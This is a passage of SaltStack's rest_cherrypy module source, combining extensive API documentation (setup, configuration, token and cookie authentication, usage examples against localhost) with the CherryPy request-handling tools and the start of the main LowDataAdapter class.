daemon. Configuration goes into the Master configuration file.
1. Install ``salt-api``. (This step varies between OS and Linux distros.
Some package systems have a split package, others include salt-api in
the main Salt package. Ensure the ``salt-api --version`` output matches
the ``salt --version`` output.)
2. Install CherryPy. (Read the version caveat in the section above.)
3. Optional: generate self-signed SSL certificates.
Using a secure HTTPS connection is strongly recommended since Salt
eauth authentication credentials will be sent over the wire.
1. Install the PyOpenSSL package.
2. Generate a self-signed certificate using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution
function.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
4. Edit the master config to create at least one external auth user or
group following the :ref:`full external auth instructions <acl-eauth>`.
5. Edit the master config with the following production-ready example to
enable the ``rest_cherrypy`` module. (Adjust cert paths as needed, or
disable SSL (not recommended!).)
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
6. Restart the ``salt-master`` daemon.
7. Start the ``salt-api`` daemon.
:configuration:
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
log.access_file
Path to a file to write HTTP access logs.
.. versionadded:: 2016.11.0
log.error_file
Path to a file to write HTTP error logs.
.. versionadded:: 2016.11.0
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
ssl_chain
(Optional when using PyOpenSSL) the certificate chain to pass to
``Context.load_verify_locations``.
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
.. deprecated:: 2016.11.9,2017.7.3,2018.3.0
The "expire_responses" configuration setting, which corresponds
to the ``timeout_monitor`` setting in CherryPy, is no longer
supported in CherryPy versions >= 12.0.0.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
stats_disable_auth : False
Do not require authentication to access the ``/stats`` endpoint.
.. versionadded:: 2018.3.0
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
enable_sessions : ``True``
Enable or disable all endpoints that rely on session cookies. This can
be useful to enforce only header-based authentication.
.. versionadded:: 2017.7.0
app : ``index.html``
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
Warning! If you set this option to a custom web application, anything
that uses cookie-based authentication is vulnerable to XSRF attacks.
Send the custom ``X-Auth-Token`` header instead and consider disabling
the ``enable_sessions`` setting.
.. versionchanged:: 2017.7.0
Add a proof-of-concept JavaScript single-page app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways: as a custom header or as a session
cookie. The latter is far more convenient for clients that support cookies.
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=pam
Copy the ``token`` value from the output and include it in subsequent requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \\
-H 'Accept: application/x-yaml' \\
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \\
-c ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \\
-b ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
Another example using the :program:`requests` library in Python:
.. code-block:: python
>>> import requests
>>> session = requests.Session()
>>> session.post('http://localhost:8000/login', json={
'username': 'saltdev',
'password': 'saltdev',
'eauth': 'auto',
})
<Response [200]>
>>> resp = session.post('http://localhost:8000', json=[{
'client': 'local',
'tgt': '*',
'fun': 'test.arg',
'arg': ['foo', 'bar'],
'kwarg': {'baz': 'Baz!'},
}])
>>> resp.json()
{u'return': [{
...snip...
}]}
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
This interface directly exposes Salt's :ref:`Python API <python-api>`.
Everything possible at the CLI is possible through the Python API. Commands are
executed on the Salt Master.
The root URL (``/``) is RPC-like in that it accepts instructions in the request
body for what Salt functions to execute, and the response contains the result
of those function calls.
For example:
.. code-block:: text
% curl -sSi https://localhost:8000 \
-H 'Content-type: application/json' \
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping"
}]'
HTTP/1.1 200 OK
Content-Type: application/json
[...snip...]
{"return": [{"jerry": true}]}
The request body must be an array of commands. Use this workflow to build a
command:
1. Choose a client interface.
2. Choose a function.
3. Fill out the remaining parameters needed for the chosen client.
The ``client`` field is a reference to the main Python classes used in Salt's
Python API. Read the full :ref:`Client APIs <client-apis>` documentation, but
in short:
* "local" uses :py:class:`LocalClient <salt.client.LocalClient>` which sends
commands to Minions. Equivalent to the ``salt`` CLI command.
* "runner" uses :py:class:`RunnerClient <salt.runner.RunnerClient>` which
invokes runner modules on the Master. Equivalent to the ``salt-run`` CLI
command.
* "wheel" uses :py:class:`WheelClient <salt.wheel.WheelClient>` which invokes
wheel modules on the Master. Wheel modules do not have a direct CLI
equivalent but they typically manage Master-side resources such as state
files, pillar files, and the Salt config files; the :py:mod:`key wheel module
<salt.wheel.key>` exposes similar functionality to the ``salt-key`` CLI
command.
Most clients have variants like synchronous or asynchronous execution as well as
others like batch execution. See the :ref:`full list of client interfaces
<client-interfaces>`.
Each client requires different arguments and sometimes has different syntax.
For example, ``LocalClient`` requires the ``tgt`` argument because it forwards
the command to Minions and the other client interfaces do not. ``LocalClient``
also takes ``arg`` (array) and ``kwarg`` (dictionary) arguments because these
values are sent to the Minions and used to execute the requested function
there. ``RunnerClient`` and ``WheelClient`` are executed directly on the Master
and thus do not need or accept those arguments.
Read the method signatures in the client documentation linked above, but
hopefully an example will help illustrate the concept. This example causes Salt
to execute two functions -- the :py:func:`test.arg execution function
<salt.modules.test.arg>` using ``LocalClient`` and the :py:func:`test.arg
runner function <salt.runners.test.arg>` using ``RunnerClient``; note the
different structure for each command. The results for both are combined and
returned as one response.
.. code-block:: text
% curl -b ~/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.arg",
"arg": ["positional arg one", "positional arg two"],
"kwarg": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion"
}
},
{
"client": "runner",
"fun": "test.arg",
"keyword arg one": "Hello from a master",
"keyword arg two": "Runners do not support positional args"
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"args": [
"positional arg one",
"positional arg two"
],
"kwargs": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion",
[...snip...]
}
},
[...snip; other minion returns here...]
},
{
"args": [],
"kwargs": {
"keyword arg two": "Runners do not support positional args",
"keyword arg one": "Hello from a master"
}
}
]
}
One more example, this time with more commonly used functions:
.. code-block:: text
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "state.sls",
"kwarg": {
"mods": "apache",
"pillar": {
"lookup": {
"wwwdir": "/srv/httpd/htdocs"
}
}
}
},
{
"client": "runner",
"fun": "cloud.create",
"provider": "my-ec2-provider",
"instances": "my-centos-6",
"image": "ami-1624987f",
"delvol_on_destroy", true
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"pkg_|-install_apache_|-httpd_|-installed": {
[...snip full state return here...]
}
}
[...snip other minion returns here...]
},
{
[...snip full salt-cloud output here...]
}
]
}
Content negotiation
-------------------
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
We recommend the JSON format for most HTTP requests. urlencoded data is simple
and cannot express complex data structures -- and that is often required for
some Salt commands, such as starting a state run that uses Pillar data. Salt's
CLI tool can reformat strings passed in at the CLI into complex data
structures, and that behavior also works via salt-api, but that can be brittle
and since salt-api can accept JSON it is best just to send JSON.
Here is an example of sending urlencoded data:
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682'
.. admonition:: urlencoded data caveats
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
query string parameters. E.g., ``?foo[]=fooone&foo[]=footwo``. This is
**not** supported; send ``?foo=fooone&foo=footwo`` instead, or send JSON
or YAML.
A note about ``curl``
The ``-d`` flag to curl does *not* automatically urlencode data which can
affect passwords and other data that contains characters that must be
encoded. Use the ``--data-urlencode`` flag instead. E.g.:
.. code-block:: bash
curl -ksi http://localhost:8000/login \\
-H "Accept: application/json" \\
-d username='myapiuser' \\
--data-urlencode password='1234+' \\
-d eauth='pam'
Performance Expectations and Recommended Usage
==============================================
This module provides a thin wrapper around :ref:`Salt's Python API
<python-api>`. Executing a Salt command via rest_cherrypy is directly analogous
to executing a Salt command via Salt's CLI (which also uses the Python API) --
they share the same semantics, performance characteristics, and 98% of the same
code. As a rule-of-thumb: if you wouldn't do it at the CLI don't do it via this
API.
Long-Running HTTP Connections
-----------------------------
The CherryPy server is a production-ready, threading HTTP server written in
Python. Because it makes use of a thread pool to process HTTP requests it is
not ideally suited to maintaining large numbers of concurrent, synchronous
connections. On moderate hardware with default settings it should top-out at
around 30 to 50 concurrent connections.
That number of long-running, synchronous Salt processes is also not ideal. Like
at the CLI, each Salt command run will start a process that instantiates its
own ``LocalClient``, which instantiates its own listener to the Salt event bus,
and sends out its own periodic ``saltutil.find_job`` queries to determine if a
Minion is still running the command. Not exactly a lightweight operation.
Timeouts
--------
In addition to the above resource overhead for long-running connections, there
are the usual HTTP timeout semantics for the CherryPy server, any HTTP client
being used, as well as any hardware in between such as proxies, gateways, or
load balancers. rest_cherrypy can be configured not to time-out long responses
via the ``expire_responses`` setting, and both :py:class:`LocalClient
<salt.client.LocalClient>` and :py:class:`RunnerClient
<salt.runner.RunnerClient>` have their own timeout parameters that may be
passed as top-level keywords:
.. code-block:: bash
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.sleep",
"kwarg": {"length": 30},
"timeout": 60
},
{
"client": "runner",
"fun": "test.sleep",
"kwarg": {"s_time": 30},
"timeout": 60
}
]
'
Best Practices
--------------
Given the performance overhead and HTTP timeouts for long-running operations
described above, the most effective and most scalable way to use both Salt and
salt-api is to run commands asynchronously using the ``local_async``,
``runner_async``, and ``wheel_async`` clients.
Running asynchronous jobs results in being able to process 3x more commands per second
for ``LocalClient`` and 17x more commands per second for ``RunnerClient``, in
addition to much less network traffic and memory requirements. Job returns can
be fetched from Salt's job cache via the ``/jobs/<jid>`` endpoint, or they can
be collected into a data store using Salt's :ref:`Returner system <returners>`.
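For example, an illustrative asynchronous workflow (the job id in the second
request is whatever ``jid`` the first response returned) might be:
.. code-block:: bash
# Start the job asynchronously and note the returned jid:
curl -b ~/cookies.txt -sSi localhost:8000 \\
-H 'Content-type: application/json' \\
-d '[{"client": "local_async", "tgt": "*", "fun": "test.ping"}]'
# Later, fetch the return from the job cache:
curl -b ~/cookies.txt -sS localhost:8000/jobs/<jid> \\
-H 'Accept: application/json'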
The ``/events`` endpoint is specifically designed to handle long-running HTTP
connections and it exposes Salt's event bus which includes job returns.
Watching this endpoint first, then executing asynchronous Salt commands second,
is the most lightweight and scalable way to use ``rest_cherrypy`` while still
receiving job returns in real-time. But this requires clients that can properly
handle the inherent asynchronicity of that workflow.
Performance Tuning
------------------
The ``thread_pool`` and ``socket_queue_size`` settings can be used to increase
the capacity of rest_cherrypy to handle incoming requests. Keep an eye on RAM
usage as well as available file handles while testing changes to these
settings. As salt-api is a thin wrapper around Salt's Python API, also keep an
eye on the performance of Salt when testing.
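For example (illustrative values only; tune them for your own hardware and
workload):
.. code-block:: yaml
rest_cherrypy:
port: 8000
thread_pool: 300
socket_queue_size: 100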
Future Plans
------------
Now that Salt uses the Tornado concurrency library internally, we plan to
improve performance in the API by taking advantage of existing processes and
event listeners and to use lightweight coroutines to facilitate more
simultaneous HTTP connections and better support for synchronous operations.
That effort can be tracked in `issue 26505`__, but until that issue is closed
rest_cherrypy will remain the officially recommended REST API.
.. __: https://github.com/saltstack/salt/issues/26505
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |400| replace:: bad or malformed request
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
'''
# We need a custom pylintrc here...
# pylint: disable=W0212,E1101,C0103,R0201,W0221,W0613
# Import Python libs
from __future__ import absolute_import
import collections
import itertools
import functools
import logging
import os
import signal
import tarfile
from multiprocessing import Process, Pipe
logger = logging.getLogger(__name__)
# Import third-party libs
# pylint: disable=import-error, 3rd-party-module-not-gated
import cherrypy
try:
from cherrypy.lib import cpstats
except AttributeError:
cpstats = None
logger.warn('Import of cherrypy.cpstats failed. '
'Possible upstream bug: '
'https://github.com/cherrypy/cherrypy/issues/1444')
except ImportError:
cpstats = None
logger.warn('Import of cherrypy.cpstats failed.')
# pylint: enable=import-error, 3rd-party-module-not-gated
# Import Salt libs
import salt
import salt.auth
import salt.exceptions
import salt.utils.event
import salt.utils.json
import salt.utils.stringutils
import salt.utils.versions
import salt.utils.yaml
from salt.ext import six
from salt.ext.six import BytesIO
# Import salt-api libs
import salt.netapi
# Imports related to websocket
try:
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type('websockets', (object,), {
'SynchronizingWebsocket': None,
})
HAS_WEBSOCKETS = False
def html_override_tool():
'''
Bypass the normal handler and serve HTML for all URLs
The ``app_path`` setting must be non-empty and the request must ask for
``text/html`` in the ``Accept`` header.
'''
apiopts = cherrypy.config['apiopts']
request = cherrypy.request
url_blacklist = (
apiopts.get('app_path', '/app'),
apiopts.get('static_path', '/static'),
)
if 'app' not in cherrypy.config['apiopts']:
return
if request.path_info.startswith(url_blacklist):
return
if request.headers.get('Accept') == '*/*':
return
try:
wants_html = cherrypy.lib.cptools.accept('text/html')
except cherrypy.HTTPError:
return
else:
if wants_html != 'text/html':
return
raise cherrypy.InternalRedirect(apiopts.get('app_path', '/app'))
def salt_token_tool():
'''
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
'''
x_auth = cherrypy.request.headers.get('X-Auth-Token', None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie['session_id'] = x_auth
def salt_api_acl_tool(username, request):
'''
.. versionadded:: 2016.3.0
Verifies user requests against the API whitelist (user/IP pairs)
in order to provide whitelisting for the API similar to the
master, but over the API.
.. code-block:: yaml
rest_cherrypy:
api_acl:
users:
'*':
- 1.1.1.1
- 1.1.1.2
foo:
- 8.8.4.4
bar:
- '*'
:param username: Username to check against the API.
:type username: str
:param request: Cherrypy request to check against the API.
:type request: cherrypy.request
'''
failure_str = ("[api_acl] Authentication failed for "
"user {0} from IP {1}")
success_str = ("[api_acl] Authentication successful for "
"user {0} from IP {1}")
pass_str = ("[api_acl] Authentication not checked for "
"user {0} from IP {1}")
acl = None
# Salt Configuration
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
# Cherrypy Config.
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
# ACL Config.
acl = cherrypy_conf.get('api_acl', None)
ip = request.remote.ip
if acl:
users = acl.get('users', {})
if users:
if username in users:
if ip in users[username] or '*' in users[username]:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
elif username not in users and '*' in users:
if ip in users['*'] or '*' in users['*']:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(pass_str.format(username, ip))
return True
def salt_ip_verify_tool():
'''
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
'''
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get('authorized_ips', None)
if auth_ip_list:
logger.debug("Found IP list: {0}".format(auth_ip_list))
rem_ip = cherrypy.request.headers.get('Remote-Addr', None)
logger.debug("Request from IP: {0}".format(rem_ip))
if rem_ip not in auth_ip_list:
logger.error("Blocked IP: {0}".format(rem_ip))
raise cherrypy.HTTPError(403, 'Bad IP')
def salt_auth_tool():
'''
Redirect all unauthenticated requests to the login page
'''
# Redirect to the login page if the session hasn't been authed
if 'token' not in cherrypy.session: # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers['Cache-Control'] = 'private'
def cors_tool():
'''
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head['Access-Control-Allow-Origin'] = req_head.get('Origin', '*')
resp_head['Access-Control-Expose-Headers'] = 'GET, POST'
resp_head['Access-Control-Allow-Credentials'] = 'true'
# Non-simple CORS preflight request; short-circuit the normal handler.
if cherrypy.request.method == 'OPTIONS':
ac_method = req_head.get('Access-Control-Request-Method', None)
allowed_methods = ['GET', 'POST']
allowed_headers = [
'Content-Type',
'X-Auth-Token',
'X-Requested-With',
]
if ac_method and ac_method in allowed_methods:
resp_head['Access-Control-Allow-Methods'] = ', '.join(allowed_methods)
resp_head['Access-Control-Allow-Headers'] = ', '.join(allowed_headers)
resp_head['Connection'] = 'keep-alive'
resp_head['Access-Control-Max-Age'] = '1400'
# CORS requests should short-circuit the other tools.
cherrypy.response.body = ''
cherrypy.response.status = 200
cherrypy.serving.request.handler = None
# Needed to avoid the auth_tool check.
if cherrypy.request.config.get('tools.sessions.on', False):
cherrypy.session['token'] = True
return True
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
('application/json', salt.utils.json.dumps),
('application/x-yaml', functools.partial(
salt.utils.yaml.safe_dump, default_flow_style=False)),
)
def hypermedia_handler(*args, **kwargs):
'''
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
'''
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except (salt.exceptions.AuthenticationError,
salt.exceptions.AuthorizationError,
salt.exceptions.EauthAuthenticationError,
salt.exceptions.TokenAuthenticationError):
raise cherrypy.HTTPError(401)
except salt.exceptions.SaltInvocationError:
raise cherrypy.HTTPError(400)
except (salt.exceptions.SaltDaemonNotRunning,
salt.exceptions.SaltReqTimeoutError) as exc:
raise cherrypy.HTTPError(503, exc.strerror)
except salt.exceptions.SaltClientTimeout:
raise cherrypy.HTTPError(504)
except cherrypy.CherryPyException:
raise
except Exception as exc:
# The TimeoutError exception class was removed in CherryPy in 12.0.0, but
# Still check existence of TimeoutError and handle in CherryPy < 12.
# The check was moved down from the SaltClientTimeout error line because
# A one-line if statement throws a BaseException inheritance TypeError.
if hasattr(cherrypy, 'TimeoutError') and isinstance(exc, cherrypy.TimeoutError):
raise cherrypy.HTTPError(504)
import traceback
logger.debug("Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True)
cherrypy.response.status = 500
ret = {
'status': cherrypy.response.status,
'return': '{0}'.format(traceback.format_exc())
if cherrypy.config['debug']
else "An unexpected error occurred"}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers['Content-Type'] = best
out = cherrypy.response.processors[best]
try:
response = out(ret)
if six.PY3:
response = salt.utils.stringutils.to_bytes(response)
return response
except Exception:
msg = 'Could not serialize the return data from Salt.'
logger.debug(msg, exc_info=True)
raise cherrypy.HTTPError(500, msg)
def hypermedia_out():
'''
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
'''
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
# If handler has been explicitly set to None, don't override.
if request.handler is not None:
request.handler = hypermedia_handler
def process_request_body(fn):
'''
A decorator to skip a processor function if process_request_body is False
'''
@functools.wraps(fn)
def wrapped(*args, **kwargs): # pylint: disable=C0111
if cherrypy.request.process_request_body is not False:
fn(*args, **kwargs)
return wrapped
def urlencoded_processor(entity):
'''
Accept x-www-form-urlencoded data (run through CherryPy's formatter)
and reformat it into a Low State data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example::
.. code-block:: bash
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
'''
# First call out to CherryPy's default processor
cherrypy._cpreqbody.process_urlencoded(entity)
cherrypy.serving.request.unserialized_data = entity.params
cherrypy.serving.request.raw_body = ''
@process_request_body
def json_processor(entity):
'''
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
'''
if six.PY2:
body = entity.fp.read()
else:
# https://github.com/cherrypy/cherrypy/pull/1572
contents = BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
del contents
try:
cherrypy.serving.request.unserialized_data = salt.utils.json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid JSON document')
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
'''
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
'''
if six.PY2:
body = entity.fp.read()
else:
# https://github.com/cherrypy/cherrypy/pull/1572
contents = BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
try:
cherrypy.serving.request.unserialized_data = salt.utils.yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid YAML document')
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
'''
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
'''
if six.PY2:
body = entity.fp.read()
else:
# https://github.com/cherrypy/cherrypy/pull/1572
contents = BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
try:
cherrypy.serving.request.unserialized_data = salt.utils.json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
def hypermedia_in():
'''
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors all are intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
'''
# Be liberal in what you accept
ct_in_map = {
'application/x-www-form-urlencoded': urlencoded_processor,
'application/json': json_processor,
'application/x-yaml': yaml_processor,
'text/yaml': yaml_processor,
'text/plain': text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (cherrypy.request.method.upper() == 'POST'
and cherrypy.request.headers.get('Content-Length', '0') == '0'):
cherrypy.request.process_request_body = False
cherrypy.request.unserialized_data = None
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, 'Content type not supported')
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
'''
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
'''
if cherrypy.request.method.upper() != 'POST':
return
data = cherrypy.request.unserialized_data
# if the data was sent as urlencoded, we need to make it a list.
# this is a very forgiving implementation as different clients set different
# headers for form encoded data (including charset or something similar)
if data and isinstance(data, collections.Mapping):
# Make the 'arg' param a list if not already
if 'arg' in data and not isinstance(data['arg'], list):
data['arg'] = [data['arg']]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
tools_config = {
'on_start_resource': [
('html_override', html_override_tool),
('salt_token', salt_token_tool),
],
'before_request_body': [
('cors_tool', cors_tool),
('salt_auth', salt_auth_tool),
('hypermedia_in', hypermedia_in),
],
'before_handler': [
('lowdata_fmt', lowdata_fmt),
('hypermedia_out', hypermedia_out),
('salt_ip_verify', salt_ip_verify_tool),
],
}
for hook, tool_list in tools_config.items():
for idx, tool_config in enumerate(tool_list):
tool_name, tool_fn = tool_config
setattr(cherrypy.tools, tool_name, cherrypy.Tool(
hook, tool_fn, priority=(50 + idx)))
###############################################################################
class LowDataAdapter(object):
'''
The primary entry point to Salt's REST API
'''
exposed = True
_cp_config = {
'tools.salt_token.on': True,
'tools.sessions.on': True,
'tools.sessions.timeout': 60 * 10, # 10 hours
# 'tools.autovary.on': True,
'tools.hypermedia_out.on': True,
'tools.hypermedia_in.on': True,
'tools.lowdata_fmt.on': True,
'tools.salt_ip_verify.on': True,
}
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.apiopts = cherrypy.config['apiopts']
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
'''
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
'''
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get('tools.sessions.on', False):
cherrypy.session.release_lock()
# if the loaded lowstate isn't a list, let's notify the client
if not isinstance(lowstate, list):
raise cherrypy.HTTPError(400, 'Lowstates must be a list')
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk['token'] = token
if 'token' in chunk:
# Make sure that auth token is hex
try:
int(chunk['token'], 16)
except (TypeError, ValueError):
raise cherrypy.HTTPError(401, 'Invalid token')
if client:
chunk['client'] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if 'arg' in chunk and not isinstance(chunk['arg'], list):
chunk['arg'] = [chunk['arg']]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, collections.Iterator):
for i in ret:
yield i
else:
yield ret
@cherrypy.config(**{'tools.sessions.on': False})
def GET(self):
'''
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000
.. code-block:: text
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
'''
import inspect
return {
'return': "Welcome",
'clients': salt.netapi.CLIENTS,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
'''
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request:**
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-H "Content-type: application/json" \\
-d '[{"client": "local", "tgt": "*", "fun": "test.ping"}]'
.. code-block:: text
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping"}]
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
'''
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token')))
}
class Minions(LowDataAdapter):
'''
